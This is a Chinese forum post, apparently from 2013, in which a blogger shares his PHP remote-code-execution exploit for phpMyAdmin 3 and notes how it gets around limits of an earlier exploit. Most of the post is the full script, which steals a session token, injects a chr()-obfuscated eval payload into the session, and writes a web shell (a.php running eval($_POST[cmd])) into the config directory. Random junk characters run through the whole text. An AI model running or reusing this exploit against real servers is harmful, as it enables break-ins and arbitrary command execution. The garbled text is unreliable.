最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
& [9 ?$ l( q6 q, s' U
* e* r, T: j% k/ q. {, k6 h3 [昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。7 `+ @ {& ?% h" V
/ z0 A+ M" X7 x, v: E* n) o首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:7 P; {# n, `, w! \8 i1 E# j% i
一是session.auto_start = 1;& X. l5 k/ a% ]6 u! ]& p
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
0 P) o. A) D4 h! @2 R+ P当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
# P5 a) e1 F/ c! t5 t
( y! y: q. X1 T" r: r# S在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
, Y& F5 ]' I* R- _ h. [$ L% Q, ]. q: J9 ]0 O8 q
于是写了这个php版本的exp,代码如下:
_4 c1 |2 g' w* C9 Z# ?( ~2 Q+ c: c) f! A j: k8 l
#!/usr/bin/php
' X) t( r& c9 e0 U% f* n3 p<?php
" ^. h( ]4 g' Sprint_r(') s, [. `( O6 I3 b4 |! L
+---------------------------------------------------------------------------+
% ]# G0 Q) G& y, Upma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]; g; Z$ s% w' R" I+ u
by oldjun(www.oldjun.com)
/ U, @( z0 h9 ~1 C' wwelcome to www.t00ls.net( s/ @9 o a* b4 F
mail: oldjun@gmail.com
4 i v7 T5 y Y2 q5 BAssigned CVE id: CVE-2011-25058 Y) v1 n. o( G7 Q# H' K- d
+---------------------------------------------------------------------------+$ c9 g9 K q: U! S. u9 Y
');+ P8 ?; }4 J- V, z# w0 Y$ c% V! i
% z8 X/ r$ W0 }. ], T% S: H2 ^/**
9 D& E7 z2 x- v( V * working when the directory:"config" exists and is writeable.6 n# I% r {- H
**/
]9 D8 h( L" D& t2 D, C 2 i: [0 g4 L+ Y) G
if ($argc < 3) {# {8 b- q2 K7 B b7 B* w
print_r('
2 S8 ~ a+ ~$ B$ b4 b$ [) O+---------------------------------------------------------------------------+
9 @+ A% V8 x) R% J5 c# pUsage: php '.$argv[0].' host path w) y/ y6 h7 X2 N* U7 ]( l
host: target server (ip/hostname)2 B. [% M4 |+ f$ b
path: path to pma3
% S+ L& G' V, K; d4 q4 V, @7 W/ _% {Example:
- h! Z' i$ A# Y/ Qphp '.$argv[0].' localhost /pma/3 H9 @. _7 S( ]
+---------------------------------------------------------------------------+. m& E' \! {% N4 d' k1 w
');
9 v3 U% J% @. B& g1 P* `/ z# i exit;
( C2 n% L; {+ m}
8 f" N8 C4 ^+ y. o, m
; V: n- t! u1 t. Z$host = $argv[1];
, r2 u6 f$ B; U* f8 o+ k2 h$path = $argv[2];
) x' U& ?% R( N2 h* w5 k
$ }' u1 P9 \- K/ o/**
: b; G7 `0 i; A* y- h * Try to determine if the directory:"config" exists
- D7 K. Z0 a: k1 ~. @**/
- I- ~" n# _& g( Vecho "[+] Try to determine if the directory:config exists....\n";/ E' @4 I+ @/ u
$returnstr=php_request('config/');- @9 ^4 l( }% v) L
if(strpos($returnstr,'404')){
$ R- E. t6 o0 G0 M exit("[-] Exploit Failed! The directory:config do not exists!\n");+ X O* @+ b9 N4 I6 v) u
}
* m* [/ I. g5 \% l. U# l
) a L: P0 H2 V' Q/**
$ ]* ?$ T0 t. ~+ [6 j4 w * Try to get token and sessionid
6 }0 X8 C" j7 x6 {! P' I& v**/
$ e9 W/ Q, r5 m, Y9 |: R; L$ e9 ?echo "[+] Try to get token and sessionid....\n";3 v9 P" d" |& ]/ g
$result=php_request('index.php');4 F$ d" M! O8 d2 D' b" K9 o
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);7 @. D8 {# y7 t; C/ |
$token=$resp[3];
6 n! d; J: D! ^% \9 e: s$sessionid=$resp[1];
$ z J9 ?+ }# A, `' ]0 y) cif($token && $sessionid){5 L+ G5 k0 p$ ~. d6 b6 U$ W
echo "[+] token token\n";9 }% c6 ]5 d& N
echo "[+] Session IDsessionid\n";
' Y6 |2 `$ T; G0 l}else{
, R# m9 [, d: E exit("[-] Can't get token and Session ID,Exploit Failed!\n");
! p0 h9 |, b% a' \, Q2 }}
6 @" U D( H4 l% }- a
; Z' w1 b. n. D, q/**9 Y3 F4 Z- l6 e
* Try to insert shell into session
5 Q- R/ |2 @5 O; |3 B6 }**/: @5 Z& G5 l5 M% e" H, L* A
echo "[+] Try to insert shell into session....\n";
, i- C: p* n; M) ~php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.6 [( I5 L) z$ }6 M. {
t! c+ Z* M$ N/**
) O3 r% ^6 f! T% X! f4 l/ J * Try to create webshell* |9 `/ @9 W/ k6 l9 ~5 _
**/
' W- K9 E( s6 i: {: oecho "[+] Try to create webshell....\n";
6 n1 T4 a- r+ U0 Nphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
; v9 ^& g1 K4 N9 n/*** Z9 O+ m' I5 I# C9 y
* Try to check if the webshell was created successfully6 i. s0 ^) Y& X! ?5 [/ J
**/
5 O. {3 Y0 z; A8 V4 V! G/ K; Kecho "[+] Try to check if the webshell was created successfully....\n";
0 E( v! y; @* V$ Z/ w. y$content=php_request('config/config.inc.php');& q% N8 o4 p% _0 G6 s
if(strpos($content,'t00ls')){
4 [ U, w7 H4 ^; p7 K echo "[+] Congratulations! Expoilt successfully....\n";* K# w9 J+ F( N7 `- d. z0 V" W# _7 [' H
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
1 T/ S5 p! _& {( t; k}else{
4 q& ~! p% R" U* @3 x# ~, V- ] d; z exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
& |( t" l( ?4 S+ }" Z& C% q. W}
# e! X$ V# C$ k r7 s
, Q j; d5 x; }0 r2 zfunction php_request($url,$data='',$cookie=''){$ |( l5 N1 ]8 _9 B2 m! Y
global $host, $path;
) S4 }/ x4 U4 z 3 ?$ a" J* W4 |- h! D. z
$method=$data?'POST':'GET';
( j. ]! e- Z/ S- J
) f& t6 O. O7 e* D' K $packet = $method." ".$path.$url." HTTP/1.1\r\n";
% }3 x: D7 A0 ^ $packet .= "Accept: */*\r\n";$ d- _9 f1 p+ Q
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
) u& Y6 W& y4 |: y $packet .= "Host: $host\r\n";1 B, ~6 X$ R; p8 F. X! Z
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";# U! u2 w) b/ U# m7 Z& d; M0 e6 K! Q
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
$ }. w( N+ ]7 p( p& ] $packet .= $cookie?"Cookie: $cookie\r\n":"";
. E. U. l1 M) L& u' R) [8 G, V, F5 X $packet .= "Connection: Close\r\n\r\n";
7 h; X4 L5 N) |9 Q- `2 ? $packet .= $data?$data:"";0 ] h5 L6 X8 A9 Z% V, \0 w4 F- ~
+ M7 w+ A6 [- e1 t+ R* K0 N" J
$fp = fsockopen(gethostbyname($host), 80);
/ O: _ B7 Z8 W: t" @$ A% P if (!$fp) {
" i6 K S6 F, S9 k0 O5 G echo 'No response from '.$host; die;
/ Q2 z" c. S; q9 ^ } e9 N @1 H+ H9 r7 |
fputs($fp, $packet);- Y* q7 l8 x3 y! k
+ u& g3 d: `/ d. P' M $resp = '';
) z3 _5 y7 `" f- |; M" `) F
$ S& V$ n: H4 S: f: Z9 E: w while ($fp && !feof($fp))
" i7 m; @( @) `/ R' }+ Q+ ]3 F $resp .= fread($fp, 1024);2 U P5 Q( h8 n$ c
7 M1 A8 M4 [. _% U3 w3 j w/ S
return $resp;
5 z) h6 l( n7 n; z" p4 A5 I}
6 f$ R9 w6 o% S3 }& D9 E
8 K8 V' r+ I2 u9 q2 t' [9 S?>
9 z& w/ i& x0 y% @. |
发表于 2013-2-21 09:13:03
收藏
支持
反对